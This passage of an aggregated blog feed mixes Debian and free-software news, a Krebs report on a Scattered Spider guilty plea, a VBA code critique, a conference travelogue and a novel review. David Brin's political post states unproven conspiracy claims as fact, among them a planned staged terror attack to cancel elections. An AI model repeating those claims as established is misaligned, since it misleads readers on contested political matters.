  • Sunset the C++11 fallback of including Armadillo 14.6.3 (#504 closing #503)

  • The vignettes have refreshed bibliographies, and are now built using the Rcpp::asis vignette builder (#506)

  • One rmultinom test is skipped under R-devel which has switched to a higher precision calculation

Courtesy of my CRANberries, there is a diffstat report relative to previous release. More detailed information is on the RcppArmadillo page. Questions, comments etc should go to the rcpp-devel mailing list off the Rcpp R-Forge page.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. If you like this or other open-source work I do, you can sponsor me at GitHub. You can also sponsor my Tour de Shore 2026 ride in support of the Maywood Fine Arts Center.

Planet DebianMike Gabriel: Join us at Lomiri CodeFest on May 16-17 & Fre(i)e Software GmbH is hiring more Lomiri Developers

Lomiri Codefest in Tilburg NL (May 16-17 2026)

Just a quick invitation to an in-person event in Tilburg, the Netherlands.

All people interested in the Lomiri Operating Environment are invited to join us at the Lomiri Codefest [codefest] taking place on May 16-17 (participation is free of charge).

We are hiring Lomiri developers

And as another side note, we still have budget (until 07/2027) for 2-3 additional Lomiri developers (depending on each dev's weekly availability). The details of my previous post [hiringdetails] +/- still apply. One more limitation / strength: You need real coding skills to apply for the open positions, AI-generated contributions will not be accepted for the tasks at hand.

If you are interested, are a skilled FLOSS developer (you need previous OSS contributions as references), and are available for at least 10 hrs / week, please get in touch [fsgmbh].

References

[codefest] https://codefest.os-sci.info/?lang=en
[hiringdetails] https://sunweavers.net/blog/node/150
[fsgmbh] https://freiesoftware.gmbh/

Planet DebianSergio Cipriano: How to view the Debian Upload Queue

How to view the Debian Upload Queue

Some people may not know this, but the Debian Upload Queue is public and very easy to access:

$ curl ftp://ftp.upload.debian.org/pub/UploadQueue/
drwxr-sr-x   18 1518     1281         4096 Jun 26  2019 DELAYED
-rw-r--r--    1 1518     1281         3442 Jul 14  2025 README
-rw-r-----    1 117      1281         3052 Apr 20 21:32 neovim-tokyonight_4.14.1-1.debian.tar.xz
-rw-r-----    1 117      1281         2119 Apr 20 21:32 neovim-tokyonight_4.14.1-1.dsc
-rw-r-----    1 117      1281         5533 Apr 20 21:32 neovim-tokyonight_4.14.1-1_amd64.buildinfo
-rw-r-----    1 117      1281         2637 Apr 20 21:32 neovim-tokyonight_4.14.1-1_source.changes
-rw-r-----    1 117      1281       197584 Apr 20 21:32 neovim-tokyonight_4.14.1.orig.tar.gz

Krebs on Security‘Scattered Spider’ Member ‘Tylerb’ Pleads Guilty

A 24-year-old British national and senior member of the cybercrime group “Scattered Spider” has pleaded guilty to wire fraud conspiracy and aggravated identity theft. Tyler Robert Buchanan admitted his role in a series of text-message phishing attacks in the summer of 2022 that allowed the group to hack into at least a dozen major technology companies and steal tens of millions of dollars worth of cryptocurrency from investors.

Buchanan’s hacker handle “Tylerb” once graced a leaderboard in the English-language criminal hacking scene that tracked the most accomplished cyber thieves. Now in U.S. custody and awaiting sentencing, the Dundee, Scotland native is facing the possibility of more than 20 years in prison.

A screenshot of two photos of Buchanan that appeared in a Daily Mail story dated May 3, 2025.

Two photos published in a Daily Mail story dated May 3, 2025 show Buchanan as a child (left) and as an adult being detained by airport authorities in Spain. “M&S” in this screenshot refers to Marks & Spencer, a major U.K. retail chain that suffered a ransomware attack last year at the hands of Scattered Spider.

Scattered Spider is the name given to a prolific English-speaking cybercrime group known for using social engineering tactics to break into companies and steal data for ransom, often impersonating employees or contractors to deceive IT help desks into granting access.

As part of his guilty plea, Buchanan admitted conspiring with other Scattered Spider members to launch tens of thousands of SMS-based phishing attacks in 2022 that led to intrusions at a number of technology companies, including Twilio, LastPass, DoorDash, and Mailchimp.

The group then used data stolen in those breaches to carry out SIM-swapping attacks that siphoned funds from individual cryptocurrency investors. In an unauthorized SIM-swap, crooks transfer the target’s phone number to a device they control and intercept any text messages or phone calls to the victim’s device — such as one-time passcodes for authentication and password reset links sent via SMS. The U.S. Justice Department said Buchanan admitted to stealing at least $8 million in virtual currency from individual victims throughout the United States.

FBI investigators tied Buchanan to the 2022 SMS phishing attacks after discovering the same username and email address was used to register numerous phishing domains seen in the campaign. The domain registrar NameCheap found that less than a month before the phishing spree, the account that registered those domains logged in from an Internet address in the U.K. FBI investigators said the Scottish police told them the address was leased to Buchanan throughout 2022.

As first reported by KrebsOnSecurity, Buchanan fled the United Kingdom in February 2023, after a rival cybercrime gang hired thugs to invade his home, assault his mother, and threaten to burn him with a blowtorch unless he gave up the keys to his cryptocurrency wallet. That same year, U.K. investigators found a device at Buchanan’s Scotland residence that included data stolen from SMS phishing victims and seed phrases from cryptocurrency theft victims.

Buchanan was arrested by Spanish authorities in June 2024 while trying to board a flight to Italy. He was extradited to the United States and has remained in U.S. federal custody since April 2025.

Buchanan is the second known Scattered Spider member to plead guilty. Noah Michael Urban, 21, of Palm Coast, Fla., was sentenced to 10 years in federal prison last year and ordered to pay $13 million in restitution. Three other alleged co-conspirators — Ahmed Hossam Eldin Elbadawy, 24, a.k.a. “AD,” of College Station, Texas; Evans Onyeaka Osiebo, 21, of Dallas, Texas; and Joel Martin Evans, 26, a.k.a. “joeleoli,” of Jacksonville, North Carolina – still face criminal charges.

Two other alleged Scattered Spider members will soon be tried in the United Kingdom. Owen Flowers, 18, and Thalha Jubair, 20, are facing charges related to the hacking and extortion of several large U.K. retailers, the London transit system, and healthcare providers in the United States. Both have pleaded not guilty, and their trial is slated to begin in June.

Investigators say the Scattered Spider suspects are part of a sprawling cybercriminal community online known as “The Com,” wherein hackers from different cliques boast publicly on Telegram and Discord about high-profile cyber thefts that almost invariably begin with social engineering — tricking people over the phone, email or SMS into giving away credentials that allow remote access to corporate internal networks.

One of the more popular SIM-swapping channels on Telegram has long maintained a leaderboard of the most rapacious SIM-swappers, indexed by their supposed conquests in stealing cryptocurrency. That leaderboard previously listed Buchanan’s hacker alias Tylerb at #65 (out of 100 hackers), with Urban’s moniker “Sosa” coming in at #24.

Buchanan’s sentencing hearing is scheduled for August 21, 2026. According to the Justice Department, he faces a statutory maximum sentence of 22 years in federal prison. However, any sentence the judge hands down in this case may be significantly tempered by a number of mitigating factors in the U.S. Sentencing Guidelines, including the defendant’s age, criminal history, time already served in U.S. custody, and the degree to which they cooperated with federal authorities.

Cryptogram Mexican Surveillance Company

Grupo Seguritech is a Mexican surveillance company that is expanding into the US.

Planet DebianRussell Coker: More About Ebook Readers in Debian

FBReader

After my previous blog post about eBook readers in Debian [1] a reader recommended FBReader. I tried it and it's now my favourite reader. It works nicely on laptop and phone and takes significantly less RAM than Calibre or Arianna (especially important for phones). While the problems with my FLX1s not displaying text with Calibre or Arianna might be the fault of something on the FLX1s side, those problems just don't happen with FBReader.

FBReader has apparently now got a proprietary version as the upstream, but we still have FOSS code to use in Debian. It would be nice if someone updated it to store the reading location using WebDAV and/or a local file that can be copied with the NextCloud client or similar. Currently there is code to store reading location in the Google cloud which I don’t want to use. It’s not THAT difficult to see what chapter you are at with one device and just skip to that part on another, but it is an annoyance.

One thing I really like about FBReader is that you can run it with an epub file on the command line and it just opens it, and when it's been closed you can open it again to the same spot in the same file. I don't want a "library" to view a book list, I just want to go back to what I was last reading in a hurry. Calibre might be better for some uses, for example I can imagine someone in the publishing industry with a collection of thousands of epub files finding that Calibre works better for them. But for the typical person who just wants to read one book and keep reading it until they finish it FBReader seems clearly better. The GUI is a little unusual, but it's not at all confusing and it works really well on mobile.

Okular

I tried Okular (the KDE viewer for PDF files etc), which displays epub files if you have the “okular-extra-backends” package installed, but it appears not to display books with the background color set to black. I would appreciate it if someone who has read some public domain or CC-licensed epub files could recommend ones with a black background that I could use for testing, as I can’t file a Debian bug report without sample data to reproduce the bug. I decided not to use it for actual book reading as FBReader is far better for my use, taking less RAM and being well optimised for mobile use.

Foliate

Foliate supports specifying a book on the command line, which is nice. But it takes more memory than FBReader, probably mostly due to using WebKit to display things. The output was in 2 columns of small text on my laptop, which is probably configurable, but I didn’t proceed with it. I determined that it doesn’t compare with FBReader for my use. It’s written in JavaScript, which may be a positive feature for some people.

Koodo

I had a brief test of Koodo which isn’t in Debian. Here is the Koodo Reader Github [2]. I installed the .deb that they created, it installs files to “/opt/Koodo Reader/” (yes that’s a space in the directory name) and appears to have Chromium as part of the runtime. I didn’t go past that even though it appears to have a decent feature set. It is licensed under version 3 of the AGPL so is suitable for Debian packaging if someone wants to do it.

Thorium

I saw the Thorium reader on Github [3] which looks promising, it’s under the BSD 3 clause license so is suitable for Debian packaging. The EDR Lab seems like a good project for advancing electronic document use [4] and it would be good to have their stuff in Debian.

For the moment I’m happy using FBReader.

365 TomorrowsMcPhysics

Author: Majoki Philomena paced the floor of the lab. “It’s the only thing that will do the trick.” “Quantum bacon?” “Of course, quantum bacon. What else is going to attract the right kind of scientists to work here?” “And who exactly are the ‘right kind’ of scientists?” Akira asked. Philomena smiled her patient and most […]

The post McPhysics appeared first on 365tomorrows.

Worse Than FailureTurning Thirty

Eric O worked for a medical device company. The medical device industry moves slowly, relative to other technical industries. Medical science and safety have their own cadence, and at a certain point, iterating faster doesn't matter much.

Eric was working on a new feature on a system that had been in use for thirteen years. This new feature interacted with a database which stored information about racks of test tubes, and Eric's tests meant creating several entries for racks of test tubes. And that's when Eric discovered that the database only allowed thirty racks. Add any more, and it would just roll right back over to one.

This was odd. The database was small- less than 40MB, even in production- and there were automatic tasks to purge old data for compliance purposes. Why a hard limit of thirty?

Eric had only been at the company for a year, so he asked one of the more senior team members, Lester. "Oh yeah, that was before my time. You should probably ask Carl."

Later that day, Eric happened to bump into Carl around the coffee maker, and asked the question. "Oh, yeah, I do vaguely remember something about that. It was in the requirements for the product. I thought it was weird, but didn't think too much about it. You should probably ask Elise, she's been here like twenty years."

Well, now it was getting curious. Eric went over to the "old building", as it was named, the original office for the company on the other side of the parking lot. Most of the offices had moved to the new building a decade earlier, and it mostly served as fabrication and storage, but a few offices remained.

Elise was on the third floor, down a poorly lit hallway, sitting in an office with water-stained acoustical tile in its ceiling. "Oh, yeah, I put that into the requirements document. It's funny, I thought it was weird too, but the system you're working on was a replacement for an older system. Our requirements were derived from those. Let me think… Irving worked on that, but he's dead, god rest him. Penny is retired. Oh, you know, Humbert is still around. He didn't work on that, but he worked on some of the systems that came before that. He's upstairs and on the other side of the building."

Eric went upstairs and to the other side of the building. The fourth floor had been last remodeled circa 1985, and the ugly industrial paint on the wall was made even uglier by the fact that someone had replaced most of the fluorescent tubes with LEDs. Most. The mismatched color temperature started Eric down the path of a headache.

Humbert was in an office similar to Elise's. On his desk was a plaque commemorating 40 years of service with the company. Eric asked about the limitation, and Humbert laughed.

"You're working on the latest version of a product that initially started on an old PDP-11 running MUMPS. I mean, the first versions, anyway. We ran to desktop computers as fast as we could. I wrote a version for DOS in… oh… '86? I knew none of the facilities we worked with had more than ten or fifteen racks of tubes, and I needed somehow to limit the size of the database so it all fit on a single 5 1/4" floppy disk. I picked thirty, because it seemed like a good round number. Honestly, I'm shocked that the limit still exists."

So was Eric. There had been several ground-up-rewrites since 1986, before the one Eric maintained had been released thirteen years ago. Each one of them had chosen to maintain the same limitation, without ever considering why it existed. The rule had simply been copied, mindlessly, for 40 years.

"I'm kind of impressed," Eric said to Humbert, "in a horrified way."

"Me too, kid, me too."


Planet DebianRavi Dwivedi: LibreOffice Conference Budapest 2025

In September 2025, I attended the LibreOffice Conference in Budapest, Hungary, on the 4th and the 5th, and a community meeting on the 3rd. Thanks to The Document Foundation (TDF) for sponsoring my travel and accommodation costs. The conference venue was Faculty of Informatics, Eötvös Loránd University (ELTE).

The conference was planned to be held from the 4th to the 6th, but the program for the 6th of September had to be canceled due to the venue being unavailable because of a marathon in Budapest. So, all the talks got squeezed into just two days, making the schedule a bit hectic.

The TDF had booked my room at the Corvin Hotel. It was a double bedroom with a window. Breakfast was included in the hotel booking. The hotel was within walking distance of the conference venue. One could also take a tram from the hotel to reach the venue.

A double bed

A shot of my room. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

Tram

A tram in Budapest. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

3rd of September

On the 3rd of September, we had a community meeting at the above-mentioned venue. I walked with my friend Dione to the venue. Upon reaching there, I noticed that the university had no boundaries and gates. This reminded me of the previous year’s conference venue in Luxembourg, which also had no boundaries or gates.

In contrast, Indian universities and institutes typically have walls and gates serving as boundaries to separate them from the rest of the city. Many of these institutes also have security guards at the entrance, who may ask attendees to present proof of admission before allowing them inside. I was surprised to find that institutes in Europe, like the one where the conference was held, did not have such boundaries.

The building where the conference was held was red, which happened to be the same color as the building for the previous year’s conference venue. I remember joking with Dione that the criteria for the conference venue might have been the color of the building.

A red building

The red building in the picture served as the conference venue. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

During the community meeting, we shared ideas on how to spread the word about LibreOffice. The meeting lasted for a couple of hours.

After the community meeting, we went to the hotel for dinner sponsored by the TDF.

Cake slices

These Esterházy cake bites were really yummy. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

Raspberry Currant cake slices

Raspberry Currant cake slices. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

4th of September

On the first day of the conference, attendees were given swag bags containing a pad, sticky notes, a pen, a conference T-shirt, and a bottle.

A blue colored T-shirt on a bed along with a pen, a bottle, a diary and a sticky note

Conference swag. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

The talks started early in the morning with Eliane Domingos, Chairperson of TDF’s Board of Directors, giving the inauguration talk. As always, I found Italo Vignoli’s talk on the importance of document freedom interesting.

During the snack break, I noticed that there were three types of milk available for coffee: cow’s milk, lactose-free milk, and almond milk. Almond milk is rare in India, though I have managed to get it; lactose-free milk I have never seen there.

Since I run fundraisers in my projects, such as Prav, I could relate to Lothar K. Becker’s talk. He discussed the issue that certain implementations in LibreOffice require a budget that is too large for any single interested entity to fund independently. Furthermore, The Document Foundation (TDF) cannot legally receive funds from government entities. Therefore, there is no organization or entity to pool resources from all the interested entities to finance the implementation.

Lothar giving his presentation

Lothar giving his presentation. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

Another talk was by the Austrian Armed Forces on their migration to LibreOffice. I wanted to know why they migrated, and I found out that they did it for digital sovereignty, not to save on license costs. Another point presented in the talk was that LibreOffice is available on all the operating systems, while the Microsoft Office suite is not as widely available. The migration was systematic and was performed over a few years: they started working on it in 2021, and the migration was finished recently. It also required training their staff to use LibreOffice.

Presentation on migration to LibreOffice by Austrian Armed Forces

Presentation on migration to LibreOffice by Austrian Armed Forces. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

The lunch was inside the university canteen. We were provided lunch coupons by the TDF. I got a vegan coupon with 4000 Ft written on it, which meant I could take lunch for up to 4000 Hungarian forints.

My lunch ticket

My lunch ticket for the conference. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

The lunch I had on the first day

The lunch I had on the first day. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

In the evening, it was my turn to present. I had finished preparing my slides ten days before my talk, and I also got them reviewed by friends.

I finished my talk in 20 minutes, although I had been given a 30-minute slot, which helped us catch up on the schedule. I made the talk interactive by asking questions and making sure that the audience was not asleep. During my talk, my friend Dione took pictures of me with my camera.

My talk was on how free software projects could give users a say in freedom to modify the software. I illustrated this using the Prav project that I am a part of.

After the talks were over, we were treated to a conference dinner at Trofea Grill. It had a great selection of desserts, which helped me sample some Hungarian desserts. The sponge cake was especially good.

Desserts at Trofea Grill

Desserts at Trofea Grill. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

5th of September

The next day—the 5th of September—I went with Dione to the venue early in the morning, as her talk was the first one of the day. Her talk was titled Managing Tasks with Nextcloud Deck. Later that day, I also attended a talk on Collabora. At lunch, I found the egg white salad quite tasty.

Dione giving her presentation

Dione giving her presentation. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

Egg white salad

Egg white salad. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.

After the lunch break, we had the conference group photo. We used my Nikon camera for it; I asked a university student to take the photo and taught her how to operate the camera.

People looking at the camera and smiling

Group photo

By the evening the conference had ended, after which we went to a pub, again sponsored by the TDF. I had a beer, but it really tasted bad, so I couldn’t finish it. The only vegetarian option was a goat cheese burger, which my friend Manish and I opted for. The burger tasted awful; apparently, I don’t like goat cheese.

The next day I went sightseeing with Dione in Budapest. Stay tuned for our adventures!

Credits: Thanks to Dione and Richard for proofreading.

,

Planet DebianBits from Debian: Debian Project Leader election 2026 is over, Sruthi Chandran elected!

The voting period and tally of votes for the Debian Project Leader election has just concluded, and the winner is Sruthi Chandran. Congratulations!

347 out of 1,039 Developers voted using the Condorcet method.

More information about the results of the voting is available on the Debian Project Leader Elections 2026 page.

Many thanks to Sruthi Chandran for her campaign, to our Developers for their votes, and to Andreas Tille for his service as DPL over the past two years!

The new term for the project leader will start on April 21, 2026 and expire on April 20, 2027.

David BrinWhy we have some goodwill around the globe, rooting for us to overcome (again) our recurring demons... And the real danger when we're hit by that coming 9/11 Reichstag Fire.

As the Putinists continue wrecking all U.S. institutions and turning the world (including longtime allies) against us, it's important to recall how much goodwill Trump and his ilk must eliminate, before that promise to Moscow can be fulfilled. Of course all empires are disliked, but elsewhere I describe how George Marshall, FDR, Truman, Ike etc. set things up so that humanity would have its best 80 years, ever. Better than all of prior human history combined. Resulting in the *least hated* empire. That is... until now.

Okay, Pax Americana will never be the same after Trump. And maybe that's good. Other centers of Enlightenment are stepping up. But when the Union finally wins this latest phase 9 of Civil War betrayal by our idiot Hyde-Side neighbors, watch the joy burst forth around the globe... and across all Americans of goodwill and sapience. 

Want evidence for that assertion? Amid our self-reproach, let's remember times when America did take brave steps toward light. There are others, on this planet, who remember, as well. And you need the gift that I am about to give you.


This song by Michel Sardou is called "Les Ricains" which means, more or less, "The Yankees." Here are the lyrics, to read along.


Les Ricains by Michel Sardou


If the Ricans weren't there

Si les Ricains n'étaient pas là

You would all be in Germania

Vous seriez tous en Germanie

To speak of I don't know what

A parler de je ne sais quoi

To greet I do not know who

A saluer je ne sais qui


Of course years have passed

Bien sûr les années ont passé

The rifles changed hands

Les fusils ont changé de mains

Is this a reason to forget

Est-ce une raison pour oublier

That one day we needed them?

Qu'un jour on en a eu besoin?


A guy from Georgia

Un gars venu de Georgie

Who couldn't have cared less about you

Qui se foutait pas mal de toi

Came to die in Normandy

Est v'nu mourir en Normandie

One morning when you weren't there

Un matin où tu n'y étais pas


Of course years have passed

Bien sûr les années ont passé

We became friends

On est devenus des copains

At the association of those who were shot

A l'amicale du fusillé

They say they fell for nothing

On dit qu'ils sont tombés pour rien


If the Ricans weren't there

Si les Ricains n'étaient pas là

You would all be in Germania

Vous seriez tous en Germanie

To speak of I don't know what

A parler de je ne sais quoi

To greet I do not know who

A saluer je ne sais qui



Got you a little misty-eyed?


Even better is this version... a huge crowd of French people cheering and singing along. Capable of gratitude.  They know that this American Pax, for all of its faults, prevented vastly worse. That things could have been a hell, a curse. That every other era of dismal human history was worse. 


And if we do not blow it now, we have a chance to be recalled by our heirs - organic and cyber - the true humans - as the very best that cavemen could be. Crude, bestial primitives who tried nonetheless to lift our gaze and those around us. To something better.


Listen and read along. We need this now. Right now!


Try. I dare you not to tear up, in gratitude for this gratitude.


          == But we have a tough job keeping that promise == 

Alas, the Kremlin boyz and confederates and murder sheiks have the upper hand for now, and they stick together.

Latest example: Trump has issued special exemptions letting Putin sell oil, evading world sanctions for his murderously criminal invasion of Ukraine. Fox News is a 5th column of the relabeled KGB's propaganda Comintern that has used blackmail to take over the entire Republican Party.

Amid the hooplah over the Strait of Hormuz -- ("YOU block it? No, *I* get to block it!") -- Trump has all along made offers to the Iranian Republican Guard and Religious Police etc. to make deals with him, in exchange for them kissing his ring. 

It's already happened! In Venezuela, Argentina, El Salvador etc. - and possibly soon in Cuba (DT shouts "They're next!") - the aim is never, ever to establish democracy or to liberate citizens from their oppressors.

The pattern is perfectly that of mafiosi and that of an ex-casino mogul. Taking over another gang's territory by decapitating its top capo, then getting allegiance (and resulting vigorish) from the sub-capos of the gang that's left in place.

This is now so blatant that no other theory is remotely tenable. LOOK at this image of Maduro's VP Rodriguez, all spiffed and glammed-up and grin-hugging Trump's consigliere, eager to serve... and to send Trump personally a shipment of gold! And nothing for the Venezuelan people.



Oh, and Miami crime families will slip in atop the Castro power structure in Cuba. 

This is a Mafia gang and the capo di tutti capi is named Vlad. 

His other goal? Riling up enough enemies (who had been quiescent since Obama killed Osama) to deliver us into another 9/11, that he imagines might save him, this fall. Which explains why he fired over half of our counter-terrorism experts. Now why would anyone do that? 


Put it all together folks. 


== The real purpose of the coming Reichstag Fire / 911 strike ==

Everyone will be able to see that the calamity will be a blatant set-up in order to justify declaring an emergency and martial law and to cancel the November election's likely torching of the entire treasonous GOP. 

It won't work, for that reason. Because we all can see it.

Only there is an added, underlying danger that I see discussed nowhere.

Go back to 1933. The purpose of the Reichstag Fire was to excuse the Nazi arrest of dozens of opposition parliament members. And thus, the parliament could never hold a quorum vote for new elections or a new Chancellor.

The lesson?

YOU U.S. SENATORS AND REPRESENTATIVES: START UPPING YOUR SECURITY RIGHT NOW. 

The Roberts Court has already said Trump could off you, as an 'official act,' to prevent impeachment/conviction. So talk it over. Upgrade practices. Have contingency plans. Grow eyes in the back of your heads. Do it now.

The rest of you? 

When the calamity strikes, get out there and chant "Reichstag Fire!" 

And one more word to show our intent:

"Appomattox!"


== Finally, my qualifications as a history expert! ==

Well, AI has some legit uses. One fan/reader searched the paleontology databases and found this historical record, a bit fuzzy, from the Paleolithic. It shows my legit ancestral claims are valid!

 



Planet DebianSune Vuorela: Kookbook 0.3.0 released

I recently released version 0.3.0 of my recipe manager application Kookbook – find it in git in KDE Invent or as released tarballs in https://download.kde.org/stable/kookbook/

Changes since last time are more or less “Minor bugfixes and a Qt6 port” – nothing especially noteworthy unless you aim to get rid of Qt5 on your system.

so what is kookbook?
It is a simple recipe viewer that works with semi-structured markdown. More details can be seen in the quite old 0.1.0 announcement

At some point I should do a 10-recipe example collection, but my personal collection is in Danish, so I’m not sure it is going to be useful. If someone donates me a handful of pre-formatted recipes, I will happily announce it.

Cryptogram Is “Satoshi Nakamoto” Really Adam Back?

The New York Times has a long article where the author lays out an impressive array of circumstantial evidence that the inventor of Bitcoin is the cypherpunk Adam Back.

I don’t know. The article is convincing, but it’s written to be convincing.

I can’t remember if I ever met Adam. I was a member of the Cypherpunks mailing list for a while, but I was never really an active participant. I spent more time on the Usenet newsgroup sci.crypt. I knew a bunch of the Cypherpunks, though, from various conferences around the world at the time. I really have no opinion about who Satoshi Nakamoto really is.

Worse Than FailureCodeSOD: Good Etiquette

"Here, you're a programmer, take this over. It's business critical."

That's what Felicity's boss told her when he pointed her to a network drive containing an Excel spreadsheet. The Excel spreadsheet contained a pile of macros. The person who wrote it had left, and nobody knew how to make it work, but the macros in question were absolutely business vital.

Also, it's in French.

We'll take this one in chunks. The indentation is as in the original.

Public Sub ExporToutVersBaseDonnées(ClasseurEnCours As Workbook)
Call AffectionVariables(ToutesLesCellulesNommées)
Call AffectationBaseDonnées(BaseDonnées)
BaseDonnées.Activate

The procedures AffectionVariables and AffectationBaseDonnées populate a pile of global variables. "base de données" is French for database, but don't let the name fool you- anything referencing "base de données" is referencing another Excel file located on a shared server. There are, in total, four Excel files that must live on a shared server, and two more which must be in a hard-coded path on the user's computer.

Oh, and the shared server is referenced not by a hostname, but by IP address- which is why the macros were breaking on everyone's computer; the IP address changed.

Let's continue.

'Vérifier si la ligne existe déjà.
        If ClasseurEnCours.Sheets("DATA").Range("Num_Fichier") = 0 Then
        Num_Fichier = BaseDonnées.Sheets(1).Range("Dernier_Fichier").Value + 1
Insérer_Ligne: '(étiquette Goto) insérer une ligne
    Application.GoTo Reference:="Dernière_Ligne"
            Selection.EntireRow.Insert
'Copie les cellules (colonne A à colonne FI) de la ligne au-dessus de la ligne insérée.
            With ActiveCell
                    .Offset(-1, 0).Range("A1:FM1").Copy
'Colle le format de la cellule précédemment copiée à la cellule active puis libère les données du presse papier
                    .PasteSpecial
                    .Range("A1:FM1").Value = ""
'Se repositionne au début de la ligne insérée.
                    .Range("A1").Select
            End With
            Application.CutCopyMode = False

Uh oh, Insérer_Ligne is a label for a Goto target. Not to be confused with the Application.GoTo call on the next line- that just selects a range in the spreadsheet.

After that little landmine, we copy/paste some data around in the sheet.

That's the If side of the conditional, let's look at the else clause:

        Else
Cherche_Numéro_Fichier: ' Chercher la ligne ou le numéro de fichier est égale à NumFichier.
                        While ActiveCell.Value <> Num_Fichier
                If ActiveCell.Row = Range("Etiquettes").Row Then
                    GoTo Insérer_Ligne
                End If
                ActiveCell.Offset(-1, 0).Range("a1:a1").Select
            Wend
            'Vérifier le numéro d'indice de la ligne active.
                If Cells(ActiveCell.Row, 165).Value <> ClasseurEnCours.Sheets("DATA").Range("Dernier_Indice") Then
                    ActiveCell.Offset(-1, 0).Range("A1:A1").Select
                    GoTo Cherche_Numéro_Fichier
                End If
            ActiveCell.Offset(0, 0).Range("A1:FM1").Value = ""
        End If

We start with another label, and… then we have a Goto. A Goto which jumps us back into the If side of the conditional. A Goto inside of a while loop, a while loop that's marching around the spreadsheet to search for certain values in the cell.

After the loop, we have another Goto which will possibly jump us up to the start of the else block.

The procedure ends with some cleanup:

'----- 
' Do some stuff on the active cell and the following cells on the column
'-----
BaseDonnées.Close True
Set BaseDonnées = Nothing
End Sub

I do not know what this function does, and the fact that the code is largely in a language I don't speak isn't the obstacle. I have no idea what the loops and the gotos are trying to do. I'm not even a "never use Goto ever ever ever" person; in a language like VBA, it's sometimes the best way to handle errors. But this bizarre time-traveling flow control boggles me.
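For contrast, here is a minimal sketch of the conventional error-handling idiom that Goto is usually reserved for in VBA. This is my own illustration, not code from the workbook in question, and the procedure name and server path are made up:

Public Sub OuvrirBaseAvecGestionErreur()
    Dim wb As Workbook
    On Error GoTo ErrHandler              ' any run-time error jumps forward to the handler
    Set wb = Workbooks.Open("\\serveur\partage\base.xlsx")
    ' ... do the actual work with wb here ...
    wb.Close SaveChanges:=True
    Exit Sub                              ' skip the handler when everything succeeded
ErrHandler:
    If Not wb Is Nothing Then wb.Close SaveChanges:=False
    MsgBox "Export impossible: " & Err.Description
End Sub

The jump target sits at the end of the procedure, is only reached on failure, and control never moves backwards, which is exactly what the spreadsheet above does not do.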

"Etiquettes" is French for "labels", and it may be bad etiquette but I've got some four letter labels for this code.


Planet DebianRuss Allbery: Review: Surface Detail

Review: Surface Detail, by Iain M. Banks

Publisher: Orbit
Copyright: October 2010
Printing: May 2011
ISBN: 0-316-12341-2
Format: Trade paperback
Pages: 627

Surface Detail is the ninth novel in Banks's Culture science fiction (literary space opera?) series. As with most of the Culture novels, it can be read in any order, although this isn't the best starting point. There is an Easter egg reference to Use of Weapons that would be easier to notice if you have read that book recently, but which is not that important to the story.

Lededje Y'breq is an Indented Intagliate from the Sichultian Enablement. Her body is patterned from her skin down to her bones, covered with elaborate markings similar to tattoos that extend to her internal organs. As an intagliate, she is someone's property. In her case, she is the property of Joller Veppers, the richest man in the Enablement and her father's former business partner. Intagliates are a tradition of great cultural pride in the Enablement. They are a living representation of the seriousness with which debts and honor are taken, up to and including one's not-yet-born children becoming the property of one's debtor. Such children are decorated as living works of art of the highest skill and technical sophistication; after all, the Enablement are not barbarians.

As the story opens, Lededje is attempting, not for the first time, to escape. This attempt is successful in an unexpected way.

Prin and Chay are Pavulean researchers and academics who, as this story opens, are in Hell. They are not dead; they have infiltrated the Hell that Pavuleans are shown in order to scare them into proper behavior, hoping to prove that it is not an illusion and that their society does indeed torture people in an afterlife, in more awful ways than people dare imagine. They have reached the portal through which temporary visitors exit, hoping to escape with firm evidence of the existence and horrors of the Pavulean afterlife. They will not be entirely successful.

Yime Nsokyi is a Culture agent for Quietus, the part of Contact that concerns itself with the dead. Many advanced societies throughout the galaxy have invented and reinvented the ability to digitize a mind and then run it in a virtual environment. Once a society can capture the minds of every person in that society from that point forward, it faces the question of whether to do so and, if it does, what to do with those minds. More specifically, it faces the moral question of whether to punish the minds of people who were horrible in life. It faces the question of whether to create Hell.

Vatueil is a soldier in a contestation, a limited and carefully monitored virtual war. The purpose of that war game is to, once and for all, resolve the question of whether civilizations should be allowed to create Hells. Some civilizations consider them integral to their religion or self-conception. Others consider them morally abhorrent, and that conflict was in danger of spilling over into war in the Real. Hence the War in Heaven: Both sides committed to fight in a virtual space under specific and structured rules, and the winner decides the fate of the galaxy's Hells. Vatueil is fighting for the anti-Hell side. The anti-Hell side is losing.

There are very few authors who were better at big-idea science fiction than Iain M. Banks. I've been reading a few books about AI ships and remembered that I had two unread Culture novels that I was saving. It felt like a good time to lose myself in something sprawling.

Surface Detail does sprawl. Even by Banks's standards, there was an impressive amount of infodumping in this book. Banks always has huge and lovingly described set pieces, and this book is no exception, but there are also paragraphs and pages of background and cultural musings and galactic politics. We are introduced to not one but three new Contact divisions; as well as the already-mentioned Quietus, there is Numina, which concerns itself with the races that have sublimed (transcended), and Restoria, which deals with hegemonizing swarms (grey goo nanotech, paperclip maximizers, and their equivalents).

Infodumping is both a feature and a bane of big-idea science fiction, and it helps to be in the right mood. It also helps if the info being dumped is interesting, and this is where Banks shines. This is a huge, sprawling book, but it deals with some huge, sprawling questions and it has interesting and non-reductive thoughts about them. The problems posed by the plot come with history, failed solutions, multi-sided political disputes, strategies and tactics of varying morality and efficacy, and an effort to wrestle with the irreducible complexity of trying to resolve political and ethical disagreements in a universe full of profound disagreements and moral systems that one cannot simply steamroll.

